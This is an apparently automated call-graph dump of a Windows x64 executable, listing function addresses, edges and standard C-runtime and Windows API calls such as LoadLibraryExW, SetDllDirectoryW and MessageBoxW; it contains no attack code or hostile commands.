19197->19199 19200 7ff67d0155c4 _findclose 11 API calls 19198->19200 19203 7ff67d01970d 19199->19203 19201 7ff67d0196d1 19200->19201 19202 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 19201->19202 19202->19219 19236 7ff67d019644 19203->19236 19206 7ff67d01976d 19211 7ff67d01978f 19206->19211 19213 7ff67d0197bb 19206->19213 19214 7ff67d0197d4 19206->19214 19207 7ff67d019755 19208 7ff67d0155c4 _findclose 11 API calls 19207->19208 19209 7ff67d01975a 19208->19209 19210 7ff67d01b00c __free_lconv_mon 11 API calls 19209->19210 19210->19219 19212 7ff67d01b00c __free_lconv_mon 11 API calls 19211->19212 19212->19219 19215 7ff67d01b00c __free_lconv_mon 11 API calls 19213->19215 19216 7ff67d01b00c __free_lconv_mon 11 API calls 19214->19216 19217 7ff67d0197c4 19215->19217 19216->19211 19218 7ff67d01b00c __free_lconv_mon 11 API calls 19217->19218 19218->19219 19219->19170 19220 7ff67d00c61c InitializeSListHead 19219->19220 19222 7ff67d00c526 19221->19222 19224 7ff67d00c51f 19221->19224 19225 7ff67d01a87c 19222->19225 19224->19195 19228 7ff67d01a4b8 19225->19228 19235 7ff67d020db8 EnterCriticalSection 19228->19235 19237 7ff67d019694 19236->19237 19238 7ff67d01965c 19236->19238 19237->19206 19237->19207 19238->19237 19239 7ff67d01f258 _findclose 11 API calls 19238->19239 19240 7ff67d01968a 19239->19240 19241 7ff67d01b00c __free_lconv_mon 11 API calls 19240->19241 19241->19237 19509 7ff67d015410 19510 7ff67d01541b 19509->19510 19518 7ff67d01f864 19510->19518 19531 7ff67d020db8 EnterCriticalSection 19518->19531 19242 7ff67d01b690 19243 7ff67d01b6aa 19242->19243 19244 7ff67d01b695 19242->19244 19248 7ff67d01b6b0 19244->19248 19249 7ff67d01b6fa 19248->19249 19250 7ff67d01b6f2 19248->19250 19251 7ff67d01b00c __free_lconv_mon 11 API calls 19249->19251 19252 7ff67d01b00c __free_lconv_mon 11 API calls 19250->19252 19253 7ff67d01b707 19251->19253 19252->19249 19254 7ff67d01b00c __free_lconv_mon 11 API calls 19253->19254 19255 7ff67d01b714 19254->19255 19256 7ff67d01b00c __free_lconv_mon 11 API calls 19255->19256 19257 7ff67d01b721 19256->19257 19258 7ff67d01b00c __free_lconv_mon 11 API calls 19257->19258 19259 7ff67d01b72e 19258->19259 19260 7ff67d01b00c __free_lconv_mon 11 API calls 19259->19260 19261 7ff67d01b73b 19260->19261 19262 7ff67d01b00c __free_lconv_mon 11 API calls 19261->19262 19263 7ff67d01b748 19262->19263 19264 7ff67d01b00c __free_lconv_mon 11 API calls 19263->19264 19265 7ff67d01b755 19264->19265 19266 7ff67d01b00c __free_lconv_mon 11 API calls 19265->19266 19267 7ff67d01b765 19266->19267 19268 7ff67d01b00c __free_lconv_mon 11 API calls 19267->19268 19269 7ff67d01b775 19268->19269 19274 7ff67d01b558 19269->19274 19288 7ff67d020db8 EnterCriticalSection 19274->19288 16072 7ff67d00c17c 16093 7ff67d00c34c 16072->16093 16075 7ff67d00c2c8 16193 7ff67d00c67c IsProcessorFeaturePresent 16075->16193 16076 7ff67d00c198 __scrt_acquire_startup_lock 16078 7ff67d00c2d2 16076->16078 16082 7ff67d00c1b6 __scrt_release_startup_lock 16076->16082 16079 7ff67d00c67c 7 API calls 16078->16079 16081 7ff67d00c2dd __GetCurrentState 16079->16081 16080 7ff67d00c1db 16082->16080 16083 7ff67d00c261 16082->16083 16182 7ff67d01a1bc 16082->16182 16099 7ff67d00c7c8 16083->16099 16085 7ff67d00c266 16102 7ff67d001000 16085->16102 16090 7ff67d00c289 16090->16081 16189 7ff67d00c4e0 16090->16189 16200 7ff67d00c94c 16093->16200 16096 7ff67d00c190 16096->16075 16096->16076 16097 7ff67d00c37b __scrt_initialize_crt 16097->16096 16202 7ff67d00da98 16097->16202 16229 7ff67d00d1e0 16099->16229 16103 7ff67d00100b 16102->16103 16231 7ff67d0087b0 16103->16231 16105 7ff67d00101d 16238 7ff67d015ff8 16105->16238 16107 7ff67d0039cb 16245 7ff67d001eb0 16107->16245 16111 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16112 7ff67d003b93 16111->16112 16187 7ff67d00c80c GetModuleHandleW 16112->16187 16113 7ff67d0039ea 16152 7ff67d003ad2 16113->16152 16261 7ff67d007b70 16113->16261 16115 7ff67d003a1f 16116 7ff67d003a6b 16115->16116 16117 7ff67d007b70 61 API calls 16115->16117 16276 7ff67d008050 16116->16276 16123 7ff67d003a40 __std_exception_destroy 16117->16123 16119 7ff67d003a80 16280 7ff67d001cb0 16119->16280 16122 7ff67d003b4d 16125 7ff67d003bad 16122->16125 16299 7ff67d008980 16122->16299 16123->16116 16127 7ff67d008050 58 API calls 16123->16127 16124 7ff67d001cb0 121 API calls 16126 7ff67d003ab6 16124->16126 16130 7ff67d003bfb 16125->16130 16125->16152 16323 7ff67d008be0 16125->16323 16128 7ff67d003aba 16126->16128 16129 7ff67d003ad7 16126->16129 16127->16116 16399 7ff67d002b30 16128->16399 16129->16122 16412 7ff67d003fe0 16129->16412 16337 7ff67d006df0 16130->16337 16134 7ff67d003be0 16138 7ff67d003b73 16134->16138 16139 7ff67d003bee SetDllDirectoryW 16134->16139 16145 7ff67d002b30 59 API calls 16138->16145 16139->16130 16143 7ff67d003c47 16148 7ff67d003d06 16143->16148 16156 7ff67d003c66 16143->16156 16145->16152 16146 7ff67d003c15 16146->16143 16444 7ff67d006600 16146->16444 16341 7ff67d0034c0 16148->16341 16149 7ff67d002b30 59 API calls 16149->16152 16150 7ff67d003b23 16150->16122 16154 7ff67d003b28 16150->16154 16152->16111 16431 7ff67d01028c 16154->16431 16165 7ff67d003ca8 16156->16165 16480 7ff67d001ef0 16156->16480 16159 7ff67d003af5 16159->16149 16160 7ff67d003c49 16164 7ff67d006850 FreeLibrary 16160->16164 16164->16143 16165->16152 16484 7ff67d003460 16165->16484 16167 7ff67d003d20 16349 7ff67d007fe0 16167->16349 16168 7ff67d003c38 16474 7ff67d006c40 16168->16474 16172 7ff67d003d33 16174 7ff67d007b70 61 API calls 16172->16174 16173 7ff67d003ce1 16176 7ff67d006850 FreeLibrary 16173->16176 16175 7ff67d003d3f 16174->16175 16356 7ff67d008090 16175->16356 16176->16152 16183 7ff67d01a1d3 16182->16183 16184 7ff67d01a1f4 16182->16184 16183->16083 18857 7ff67d01aa68 16184->18857 16188 7ff67d00c81d 16187->16188 16188->16090 16191 7ff67d00c4f1 16189->16191 16190 7ff67d00c2a0 16190->16080 16191->16190 16192 7ff67d00da98 __scrt_initialize_crt 7 API calls 16191->16192 16192->16190 16194 7ff67d00c6a2 _wfindfirst32i64 __scrt_get_show_window_mode 16193->16194 16195 7ff67d00c6c1 RtlCaptureContext RtlLookupFunctionEntry 16194->16195 16196 7ff67d00c726 __scrt_get_show_window_mode 16195->16196 16197 7ff67d00c6ea RtlVirtualUnwind 16195->16197 16198 7ff67d00c758 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16196->16198 16197->16196 16199 7ff67d00c7aa _wfindfirst32i64 16198->16199 16199->16078 16201 7ff67d00c36e __scrt_dllmain_crt_thread_attach 16200->16201 16201->16096 16201->16097 16203 7ff67d00daaa 16202->16203 16204 7ff67d00daa0 16202->16204 16203->16096 16208 7ff67d00de14 16204->16208 16209 7ff67d00daa5 16208->16209 16210 7ff67d00de23 16208->16210 16212 7ff67d00de80 16209->16212 16216 7ff67d00e050 16210->16216 16213 7ff67d00deab 16212->16213 16214 7ff67d00de8e DeleteCriticalSection 16213->16214 16215 7ff67d00deaf 16213->16215 16214->16213 16215->16203 16220 7ff67d00deb8 16216->16220 16221 7ff67d00dfd2 TlsFree 16220->16221 16222 7ff67d00defc __vcrt_InitializeCriticalSectionEx 16220->16222 16222->16221 16223 7ff67d00df2a LoadLibraryExW 16222->16223 16224 7ff67d00dfc1 GetProcAddress 16222->16224 16228 7ff67d00df6d LoadLibraryExW 16222->16228 16225 7ff67d00df4b GetLastError 16223->16225 16226 7ff67d00dfa1 16223->16226 16224->16221 16225->16222 16226->16224 16227 7ff67d00dfb8 FreeLibrary 16226->16227 16227->16224 16228->16222 16228->16226 16230 7ff67d00c7df GetStartupInfoW 16229->16230 16230->16085 16232 7ff67d0087cf 16231->16232 16233 7ff67d008820 WideCharToMultiByte 16232->16233 16234 7ff67d0087d7 __std_exception_destroy 16232->16234 16236 7ff67d008874 WideCharToMultiByte 16232->16236 16237 7ff67d0088c6 16232->16237 16233->16232 16233->16237 16234->16105 16236->16232 16236->16237 16518 7ff67d0029e0 16237->16518 16241 7ff67d020150 16238->16241 16239 7ff67d0201a3 16240 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 16239->16240 16244 7ff67d0201cc 16240->16244 16241->16239 16242 7ff67d0201f6 16241->16242 16849 7ff67d020028 16242->16849 16244->16107 16246 7ff67d001ec5 16245->16246 16247 7ff67d001ee0 16246->16247 16857 7ff67d002890 16246->16857 16247->16152 16249 7ff67d003ed0 16247->16249 16250 7ff67d00bd60 16249->16250 16251 7ff67d003edc GetModuleFileNameW 16250->16251 16252 7ff67d003f22 16251->16252 16253 7ff67d003f0b 16251->16253 16897 7ff67d008cf0 16252->16897 16254 7ff67d0029e0 57 API calls 16253->16254 16256 7ff67d003f1e 16254->16256 16259 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16256->16259 16258 7ff67d002b30 59 API calls 16258->16256 16260 7ff67d003f5f 16259->16260 16260->16113 16262 7ff67d007b7a 16261->16262 16263 7ff67d008be0 57 API calls 16262->16263 16264 7ff67d007b9c GetEnvironmentVariableW 16263->16264 16265 7ff67d007bb4 ExpandEnvironmentStringsW 16264->16265 16266 7ff67d007c06 16264->16266 16268 7ff67d008cf0 59 API calls 16265->16268 16267 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16266->16267 16269 7ff67d007c18 16267->16269 16270 7ff67d007bdc 16268->16270 16269->16115 16270->16266 16271 7ff67d007be6 16270->16271 16908 7ff67d01aa9c 16271->16908 16274 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16275 7ff67d007bfe 16274->16275 16275->16115 16277 7ff67d008be0 57 API calls 16276->16277 16278 7ff67d008067 SetEnvironmentVariableW 16277->16278 16279 7ff67d00807f __std_exception_destroy 16278->16279 16279->16119 16281 7ff67d001cbe 16280->16281 16282 7ff67d001ef0 49 API calls 16281->16282 16283 7ff67d001cf4 16282->16283 16284 7ff67d001dde 16283->16284 16285 7ff67d001ef0 49 API calls 16283->16285 16286 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16284->16286 16287 7ff67d001d1a 16285->16287 16288 7ff67d001e6c 16286->16288 16287->16284 16915 7ff67d001aa0 16287->16915 16288->16122 16288->16124 16292 7ff67d001dcc 16293 7ff67d003e50 49 API calls 16292->16293 16293->16284 16294 7ff67d001d8f 16294->16292 16295 7ff67d001e34 16294->16295 16296 7ff67d003e50 49 API calls 16295->16296 16297 7ff67d001e41 16296->16297 16951 7ff67d004060 16297->16951 16300 7ff67d008995 16299->16300 16993 7ff67d008660 GetCurrentProcess OpenProcessToken 16300->16993 16303 7ff67d008660 7 API calls 16304 7ff67d0089c1 16303->16304 16305 7ff67d0089da 16304->16305 16306 7ff67d0089f4 16304->16306 17003 7ff67d008750 16305->17003 16308 7ff67d008750 48 API calls 16306->16308 16310 7ff67d008a07 LocalFree LocalFree 16308->16310 16311 7ff67d008a23 16310->16311 16313 7ff67d008a2f 16310->16313 17007 7ff67d002c50 16311->17007 16314 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16313->16314 16315 7ff67d003b6e 16314->16315 16315->16138 16316 7ff67d0014f0 16315->16316 16317 7ff67d00157f 16316->16317 16318 7ff67d001506 16316->16318 16317->16125 17211 7ff67d007960 16318->17211 16321 7ff67d002b30 59 API calls 16322 7ff67d001564 16321->16322 16322->16125 16324 7ff67d008c87 MultiByteToWideChar 16323->16324 16325 7ff67d008c01 MultiByteToWideChar 16323->16325 16327 7ff67d008caa 16324->16327 16328 7ff67d008ccf 16324->16328 16326 7ff67d008c27 16325->16326 16330 7ff67d008c4c 16325->16330 16329 7ff67d0029e0 55 API calls 16326->16329 16331 7ff67d0029e0 55 API calls 16327->16331 16328->16134 16332 7ff67d008c3a 16329->16332 16330->16324 16334 7ff67d008c62 16330->16334 16333 7ff67d008cbd 16331->16333 16332->16134 16333->16134 16335 7ff67d0029e0 55 API calls 16334->16335 16336 7ff67d008c75 16335->16336 16336->16134 16338 7ff67d006e05 16337->16338 16339 7ff67d003c00 16338->16339 16340 7ff67d002890 59 API calls 16338->16340 16339->16143 16435 7ff67d006aa0 16339->16435 16340->16339 16345 7ff67d003533 16341->16345 16347 7ff67d003574 16341->16347 16342 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16343 7ff67d0035c5 16342->16343 16343->16152 16348 7ff67d008950 LocalFree 16343->16348 16345->16347 17529 7ff67d001710 16345->17529 17571 7ff67d002d70 16345->17571 16347->16342 16348->16167 16350 7ff67d008be0 57 API calls 16349->16350 16351 7ff67d007fff 16350->16351 16352 7ff67d008be0 57 API calls 16351->16352 16353 7ff67d00800f 16352->16353 16354 7ff67d017eec 38 API calls 16353->16354 16355 7ff67d00801d __std_exception_destroy 16354->16355 16355->16172 16357 7ff67d0080a0 16356->16357 16358 7ff67d008be0 57 API calls 16357->16358 16359 7ff67d0080d1 SetConsoleCtrlHandler GetStartupInfoW 16358->16359 16360 7ff67d008132 16359->16360 17997 7ff67d01ab14 16360->17997 16400 7ff67d002b50 16399->16400 16401 7ff67d014bc4 49 API calls 16400->16401 16402 7ff67d002b9b __scrt_get_show_window_mode 16401->16402 16403 7ff67d008be0 57 API calls 16402->16403 16404 7ff67d002bd0 16403->16404 16405 7ff67d002bd5 16404->16405 16406 7ff67d002c0d MessageBoxA 16404->16406 16408 7ff67d008be0 57 API calls 16405->16408 16407 7ff67d002c27 16406->16407 16410 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16407->16410 16409 7ff67d002bef MessageBoxW 16408->16409 16409->16407 16411 7ff67d002c37 16410->16411 16411->16152 16413 7ff67d003fec 16412->16413 16414 7ff67d008be0 57 API calls 16413->16414 16415 7ff67d004017 16414->16415 16416 7ff67d008be0 57 API calls 16415->16416 16417 7ff67d00402a 16416->16417 18053 7ff67d0165a8 16417->18053 16420 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16421 7ff67d003aed 16420->16421 16421->16159 16422 7ff67d0082c0 16421->16422 16423 7ff67d0082e4 16422->16423 16424 7ff67d010914 73 API calls 16423->16424 16429 7ff67d0083bb __std_exception_destroy 16423->16429 16425 7ff67d0082fe 16424->16425 16425->16429 18432 7ff67d019170 16425->18432 16427 7ff67d010914 73 API calls 16430 7ff67d008313 16427->16430 16428 7ff67d0105dc _fread_nolock 53 API calls 16428->16430 16429->16150 16430->16427 16430->16428 16430->16429 16432 7ff67d0102bc 16431->16432 18447 7ff67d010068 16432->18447 16434 7ff67d0102d5 16434->16159 16436 7ff67d006ac3 16435->16436 16437 7ff67d006ada 16435->16437 16436->16437 18458 7ff67d0015a0 16436->18458 16437->16146 16439 7ff67d006ae4 16439->16437 16440 7ff67d004060 49 API calls 16439->16440 16441 7ff67d006b45 16440->16441 16442 7ff67d002b30 59 API calls 16441->16442 16443 7ff67d006bb5 memcpy_s __std_exception_destroy 16441->16443 16442->16437 16443->16146 16451 7ff67d00661a memcpy_s 16444->16451 16445 7ff67d00673f 16448 7ff67d004060 49 API calls 16445->16448 16447 7ff67d00675b 16449 7ff67d002b30 59 API calls 16447->16449 16450 7ff67d0067b8 16448->16450 16455 7ff67d006751 __std_exception_destroy 16449->16455 16454 7ff67d004060 49 API calls 16450->16454 16451->16445 16451->16447 16452 7ff67d004060 49 API calls 16451->16452 16453 7ff67d006720 16451->16453 16461 7ff67d001710 135 API calls 16451->16461 16462 7ff67d006741 16451->16462 18482 7ff67d001950 16451->18482 16452->16451 16453->16445 16456 7ff67d004060 49 API calls 16453->16456 16458 7ff67d0067e8 16454->16458 16457 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16455->16457 16456->16445 16459 7ff67d003c26 16457->16459 16460 7ff67d004060 49 API calls 16458->16460 16459->16160 16464 7ff67d006580 16459->16464 16460->16455 16461->16451 16463 7ff67d002b30 59 API calls 16462->16463 16463->16455 18486 7ff67d008270 16464->18486 16466 7ff67d00659c 16467 7ff67d008270 58 API calls 16466->16467 16469 7ff67d0065af 16467->16469 16468 7ff67d0065e5 16471 7ff67d002b30 59 API calls 16468->16471 16469->16468 16470 7ff67d0065c7 16469->16470 18490 7ff67d006f00 GetProcAddress 16470->18490 16473 7ff67d003c34 16471->16473 16473->16160 16473->16168 16475 7ff67d006c64 16474->16475 16481 7ff67d001f15 16480->16481 16482 7ff67d014bc4 49 API calls 16481->16482 16483 7ff67d001f38 16482->16483 16483->16165 18549 7ff67d005bd0 16484->18549 16487 7ff67d0034ad 16487->16173 16489 7ff67d003484 16489->16487 18618 7ff67d005930 16489->18618 16537 7ff67d00bd60 16518->16537 16521 7ff67d002a29 16539 7ff67d014bc4 16521->16539 16526 7ff67d001ef0 49 API calls 16527 7ff67d002a86 __scrt_get_show_window_mode 16526->16527 16528 7ff67d008be0 54 API calls 16527->16528 16529 7ff67d002abb 16528->16529 16530 7ff67d002ac0 16529->16530 16531 7ff67d002af8 MessageBoxA 16529->16531 16532 7ff67d008be0 54 API calls 16530->16532 16533 7ff67d002b12 16531->16533 16534 7ff67d002ada MessageBoxW 16532->16534 16535 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16533->16535 16534->16533 16536 7ff67d002b22 16535->16536 16536->16234 16538 7ff67d0029fc GetLastError 16537->16538 16538->16521 16541 7ff67d014c1e 16539->16541 16540 7ff67d014c43 16542 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 16540->16542 16541->16540 16543 7ff67d014c7f 16541->16543 16546 7ff67d014c6d 16542->16546 16569 7ff67d012e50 16543->16569 16547 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16546->16547 16549 7ff67d002a57 16547->16549 16548 7ff67d01b00c __free_lconv_mon 11 API calls 16548->16546 16557 7ff67d008570 16549->16557 16550 7ff67d014d5c 16550->16548 16551 7ff67d014d80 16551->16550 16553 7ff67d014d8a 16551->16553 16552 7ff67d014d31 16554 7ff67d01b00c __free_lconv_mon 11 API calls 16552->16554 16556 7ff67d01b00c __free_lconv_mon 11 API calls 16553->16556 16554->16546 16555 7ff67d014d28 16555->16550 16555->16552 16556->16546 16558 7ff67d00857c 16557->16558 16559 7ff67d008597 GetLastError 16558->16559 16560 7ff67d00859d FormatMessageW 16558->16560 16559->16560 16561 7ff67d0085ec WideCharToMultiByte 16560->16561 16562 7ff67d0085d0 16560->16562 16564 7ff67d008626 16561->16564 16565 7ff67d0085e3 16561->16565 16563 7ff67d0029e0 54 API calls 16562->16563 16563->16565 16566 7ff67d0029e0 54 API calls 16564->16566 16567 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16565->16567 16566->16565 16568 7ff67d002a5e 16567->16568 16568->16526 16570 7ff67d012e8e 16569->16570 16571 7ff67d012e7e 16569->16571 16572 7ff67d012e97 16570->16572 16579 7ff67d012ec5 16570->16579 16575 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 16571->16575 16573 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 16572->16573 16574 7ff67d012ebd 16573->16574 16574->16550 16574->16551 16574->16552 16574->16555 16575->16574 16577 7ff67d013174 16581 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 16577->16581 16579->16571 16579->16574 16579->16577 16583 7ff67d0137e0 16579->16583 16609 7ff67d0134a8 16579->16609 16639 7ff67d012d30 16579->16639 16642 7ff67d014a00 16579->16642 16581->16571 16584 7ff67d013822 16583->16584 16585 7ff67d013895 16583->16585 16586 7ff67d013828 16584->16586 16587 7ff67d0138bf 16584->16587 16588 7ff67d01389a 16585->16588 16589 7ff67d0138ef 16585->16589 16594 7ff67d01382d 16586->16594 16597 7ff67d0138fe 16586->16597 16666 7ff67d011d90 16587->16666 16590 7ff67d01389c 16588->16590 16591 7ff67d0138cf 16588->16591 16589->16587 16589->16597 16607 7ff67d013858 16589->16607 16593 7ff67d01383d 16590->16593 16600 7ff67d0138ab 16590->16600 16673 7ff67d011980 16591->16673 16608 7ff67d01392d 16593->16608 16648 7ff67d014144 16593->16648 16594->16593 16598 7ff67d013870 16594->16598 16594->16607 16597->16608 16680 7ff67d0121a0 16597->16680 16598->16608 16658 7ff67d014600 16598->16658 16600->16587 16601 7ff67d0138b0 16600->16601 16601->16608 16662 7ff67d014798 16601->16662 16603 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16605 7ff67d013bc3 16603->16605 16605->16579 16607->16608 16687 7ff67d01ef18 16607->16687 16608->16603 16610 7ff67d0134c9 16609->16610 16611 7ff67d0134b3 16609->16611 16612 7ff67d013507 16610->16612 16615 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 16610->16615 16611->16612 16613 7ff67d013822 16611->16613 16614 7ff67d013895 16611->16614 16612->16579 16616 7ff67d013828 16613->16616 16617 7ff67d0138bf 16613->16617 16618 7ff67d01389a 16614->16618 16619 7ff67d0138ef 16614->16619 16615->16612 16626 7ff67d01382d 16616->16626 16628 7ff67d0138fe 16616->16628 16622 7ff67d011d90 38 API calls 16617->16622 16620 7ff67d01389c 16618->16620 16621 7ff67d0138cf 16618->16621 16619->16617 16619->16628 16636 7ff67d013858 16619->16636 16623 7ff67d01383d 16620->16623 16630 7ff67d0138ab 16620->16630 16624 7ff67d011980 38 API calls 16621->16624 16622->16636 16625 7ff67d014144 47 API calls 16623->16625 16638 7ff67d01392d 16623->16638 16624->16636 16625->16636 16626->16623 16627 7ff67d013870 16626->16627 16626->16636 16632 7ff67d014600 47 API calls 16627->16632 16627->16638 16629 7ff67d0121a0 38 API calls 16628->16629 16628->16638 16629->16636 16630->16617 16631 7ff67d0138b0 16630->16631 16634 7ff67d014798 37 API calls 16631->16634 16631->16638 16632->16636 16633 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16635 7ff67d013bc3 16633->16635 16634->16636 16635->16579 16637 7ff67d01ef18 47 API calls 16636->16637 16636->16638 16637->16636 16638->16633 16824 7ff67d010f54 16639->16824 16643 7ff67d014a17 16642->16643 16841 7ff67d01e078 16643->16841 16649 7ff67d014166 16648->16649 16697 7ff67d010dc0 16649->16697 16653 7ff67d0142a3 16655 7ff67d01432c 16653->16655 16657 7ff67d014a00 45 API calls 16653->16657 16655->16607 16656 7ff67d014a00 45 API calls 16656->16653 16657->16655 16659 7ff67d014618 16658->16659 16661 7ff67d014680 16658->16661 16660 7ff67d01ef18 47 API calls 16659->16660 16659->16661 16660->16661 16661->16607 16664 7ff67d0147b9 16662->16664 16663 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 16665 7ff67d0147ea 16663->16665 16664->16663 16664->16665 16665->16607 16667 7ff67d011dc3 16666->16667 16668 7ff67d011df2 16667->16668 16670 7ff67d011eaf 16667->16670 16669 7ff67d010dc0 12 API calls 16668->16669 16672 7ff67d011e2f 16668->16672 16669->16672 16671 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 16670->16671 16671->16672 16672->16607 16674 7ff67d0119b3 16673->16674 16675 7ff67d0119e2 16674->16675 16677 7ff67d011a9f 16674->16677 16676 7ff67d010dc0 12 API calls 16675->16676 16679 7ff67d011a1f 16675->16679 16676->16679 16678 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 16677->16678 16678->16679 16679->16607 16681 7ff67d0121d3 16680->16681 16682 7ff67d012202 16681->16682 16684 7ff67d0122bf 16681->16684 16683 7ff67d010dc0 12 API calls 16682->16683 16686 7ff67d01223f 16682->16686 16683->16686 16685 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 16684->16685 16685->16686 16686->16607 16688 7ff67d01ef40 16687->16688 16689 7ff67d01ef85 16688->16689 16690 7ff67d014a00 45 API calls 16688->16690 16693 7ff67d01ef45 __scrt_get_show_window_mode 16688->16693 16696 7ff67d01ef6e __scrt_get_show_window_mode 16688->16696 16692 7ff67d0205c8 WideCharToMultiByte 16689->16692 16689->16693 16689->16696 16690->16689 16691 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 16691->16693 16694 7ff67d01f061 16692->16694 16693->16607 16694->16693 16695 7ff67d01f076 GetLastError 16694->16695 16695->16693 16695->16696 16696->16691 16696->16693 16698 7ff67d010de6 16697->16698 16699 7ff67d010df7 16697->16699 16705 7ff67d01ec30 16698->16705 16699->16698 16700 7ff67d01dcbc _fread_nolock 12 API calls 16699->16700 16701 7ff67d010e24 16700->16701 16702 7ff67d010e38 16701->16702 16703 7ff67d01b00c __free_lconv_mon 11 API calls 16701->16703 16704 7ff67d01b00c __free_lconv_mon 11 API calls 16702->16704 16703->16702 16704->16698 16706 7ff67d01ec80 16705->16706 16707 7ff67d01ec4d 16705->16707 16706->16707 16709 7ff67d01ecb2 16706->16709 16708 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 16707->16708 16717 7ff67d014281 16708->16717 16713 7ff67d01edc5 16709->16713 16722 7ff67d01ecfa 16709->16722 16710 7ff67d01eeb7 16751 7ff67d01e11c 16710->16751 16712 7ff67d01ee7d 16744 7ff67d01e4b4 16712->16744 16713->16710 16713->16712 16714 7ff67d01ee4c 16713->16714 16716 7ff67d01ee0f 16713->16716 16719 7ff67d01ee05 16713->16719 16737 7ff67d01e794 16714->16737 16727 7ff67d01e9c4 16716->16727 16717->16653 16717->16656 16719->16712 16721 7ff67d01ee0a 16719->16721 16721->16714 16721->16716 16722->16717 16723 7ff67d01ab3c __std_exception_copy 37 API calls 16722->16723 16724 7ff67d01edb2 16723->16724 16724->16717 16725 7ff67d01afc4 _wfindfirst32i64 17 API calls 16724->16725 16726 7ff67d01ef14 16725->16726 16760 7ff67d02481c 16727->16760 16731 7ff67d01ea6c 16732 7ff67d01eac1 16731->16732 16734 7ff67d01ea8c 16731->16734 16736 7ff67d01ea70 16731->16736 16813 7ff67d01e5b0 16732->16813 16809 7ff67d01e86c 16734->16809 16736->16717 16738 7ff67d02481c 38 API calls 16737->16738 16739 7ff67d01e7de 16738->16739 16740 7ff67d024264 37 API calls 16739->16740 16741 7ff67d01e82e 16740->16741 16742 7ff67d01e832 16741->16742 16743 7ff67d01e86c 45 API calls 16741->16743 16742->16717 16743->16742 16745 7ff67d02481c 38 API calls 16744->16745 16746 7ff67d01e4ff 16745->16746 16747 7ff67d024264 37 API calls 16746->16747 16748 7ff67d01e557 16747->16748 16749 7ff67d01e55b 16748->16749 16750 7ff67d01e5b0 45 API calls 16748->16750 16749->16717 16750->16749 16752 7ff67d01e161 16751->16752 16753 7ff67d01e194 16751->16753 16754 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 16752->16754 16755 7ff67d01e1ac 16753->16755 16757 7ff67d01e22d 16753->16757 16759 7ff67d01e18d __scrt_get_show_window_mode 16754->16759 16756 7ff67d01e4b4 46 API calls 16755->16756 16756->16759 16758 7ff67d014a00 45 API calls 16757->16758 16757->16759 16758->16759 16759->16717 16761 7ff67d02486f fegetenv 16760->16761 16762 7ff67d02877c 37 API calls 16761->16762 16768 7ff67d0248c2 16762->16768 16763 7ff67d0248ef 16767 7ff67d01ab3c __std_exception_copy 37 API calls 16763->16767 16764 7ff67d0249b2 16765 7ff67d02877c 37 API calls 16764->16765 16766 7ff67d0249dc 16765->16766 16771 7ff67d02877c 37 API calls 16766->16771 16772 7ff67d02496d 16767->16772 16768->16764 16769 7ff67d0248dd 16768->16769 16770 7ff67d02498c 16768->16770 16769->16763 16769->16764 16775 7ff67d01ab3c __std_exception_copy 37 API calls 16770->16775 16773 7ff67d0249ed 16771->16773 16774 7ff67d025a94 16772->16774 16779 7ff67d024975 16772->16779 16776 7ff67d028970 20 API calls 16773->16776 16777 7ff67d01afc4 _wfindfirst32i64 17 API calls 16774->16777 16775->16772 16782 7ff67d024a56 __scrt_get_show_window_mode 16776->16782 16778 7ff67d025aa9 16777->16778 16780 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16779->16780 16781 7ff67d01ea11 16780->16781 16805 7ff67d024264 16781->16805 16783 7ff67d024a97 memcpy_s 16782->16783 16784 7ff67d024dff __scrt_get_show_window_mode 16782->16784 16789 7ff67d0155c4 _findclose 11 API calls 16782->16789 16798 7ff67d024ef3 memcpy_s __scrt_get_show_window_mode 16783->16798 16801 7ff67d0253db memcpy_s __scrt_get_show_window_mode 16783->16801 16785 7ff67d024380 37 API calls 16791 7ff67d025857 16785->16791 16786 7ff67d02513f 16786->16785 16787 7ff67d025aac memcpy_s 37 API calls 16787->16786 16788 7ff67d0250eb 16788->16786 16788->16787 16790 7ff67d024ed0 16789->16790 16792 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 16790->16792 16793 7ff67d025aac memcpy_s 37 API calls 16791->16793 16804 7ff67d0258b2 16791->16804 16792->16783 16793->16804 16794 7ff67d025a38 16796 7ff67d02877c 37 API calls 16794->16796 16795 7ff67d0155c4 11 API calls _findclose 16795->16798 16796->16779 16797 7ff67d0155c4 11 API calls _findclose 16797->16801 16798->16788 16798->16795 16802 7ff67d01afa4 37 API calls _invalid_parameter_noinfo 16798->16802 16799 7ff67d024380 37 API calls 16799->16804 16800 7ff67d01afa4 37 API calls _invalid_parameter_noinfo 16800->16801 16801->16786 16801->16788 16801->16797 16801->16800 16802->16798 16803 7ff67d025aac memcpy_s 37 API calls 16803->16804 16804->16794 16804->16799 16804->16803 16806 7ff67d024283 16805->16806 16807 7ff67d01aed8 _invalid_parameter_noinfo 37 API calls 16806->16807 16808 7ff67d0242ae memcpy_s 16806->16808 